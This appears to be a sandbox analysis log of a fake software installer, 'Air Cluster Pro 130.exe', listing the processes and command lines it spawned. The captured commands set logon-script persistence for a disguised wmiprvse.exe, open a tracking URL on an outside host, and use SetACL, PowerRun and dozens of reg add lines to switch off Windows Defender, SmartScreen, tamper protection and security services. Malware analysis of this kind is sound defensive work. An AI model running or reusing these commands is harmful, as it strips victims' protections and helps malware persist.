PID 4200 wrote to memory of 3100 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 812 wrote to memory of 3696 N/A C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
PID 4200 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe
PID 4200 wrote to memory of 1104 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe

"C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp

"C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp" /SL5="$801C8,833540,832512,C:\Users\Admin\AppData\Local\Temp\Air Cluster Pro 130.exe"

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp" /SL5="$20262,938139,832512,C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe

"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2217

C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp

"C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp" /SL5="$202EE,9877208,832512,C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe" /VERYSILENT /PASSWORD=NtIRVUpMK9ZD30Nf98220 -token mtn1co3fo4gs5vwq -subid 2217

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* %ProgramData%

C:\Windows\SysWOW64\expand.exe

expand C:\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\{app}\cvysapfvmvsjevb.cab -F:* C:\ProgramData

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\wmiprvse.exe" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe" /f

C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

"C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c start https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i^&c=5306757^&pl=0x00^&pb=1^&px=2217

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe

"C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s1.exe" 992217

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\do32.bat

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\SetACL32.exe

SetACL32 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun.exe

PowerRun /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

